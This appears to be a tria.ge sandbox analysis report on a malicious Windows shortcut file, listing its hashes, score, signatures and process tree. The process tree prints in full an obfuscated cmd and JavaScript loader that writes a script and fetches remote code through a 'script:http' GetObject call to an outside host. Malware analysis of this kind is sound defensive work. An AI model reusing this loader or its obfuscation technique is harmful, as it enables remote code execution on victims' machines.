Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
03/02/2024, 16:22
General
-
Target
CFe_SAT_235423272324734.lnk
-
Size
1KB
-
MD5
cbcc37aa507139d8408fc4e9ede5aca1
-
SHA1
31ff032fdc43f66e9176109c6d989f5f59a2db0b
-
SHA256
12491594bf58f4404bd3cf95ac334023e344421b77643d378438fce6bbbc7850
-
SHA512
e70bf846dddb647043054d45aeb6d7dfc1af9976ce62dc5d95a62cd93e2e207c49cc41a197d39dc612c4c4f4692ba2821a2fbb41a7103a6b30e3e24ad378c380
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\CFe_SAT_235423272324734.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT RXS=C:\CS6MKI\&& mD !RXS!>nul 2>&1&&S^eT IJKP=!RXS!^CGXBTDGK.JS&&<nul set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); >!IJKP!|caLl !IJKP!||caLl !IJKP! "2⤵
-